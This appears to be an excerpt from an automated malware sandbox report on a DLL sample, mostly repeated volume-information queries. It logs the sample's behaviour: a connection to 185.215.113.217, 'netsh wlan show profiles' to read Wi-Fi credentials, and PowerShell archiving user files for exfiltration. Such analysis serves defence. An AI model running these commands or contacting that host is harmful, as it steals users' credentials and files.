    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 185.215.113.217 80Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",#1Jump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
